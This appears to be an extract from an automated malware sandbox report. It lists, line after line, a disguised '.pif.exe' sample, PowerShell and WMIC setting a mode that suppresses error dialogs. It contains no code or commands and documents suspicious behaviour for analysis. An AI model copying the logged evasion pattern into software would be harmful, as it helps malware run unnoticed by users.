            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
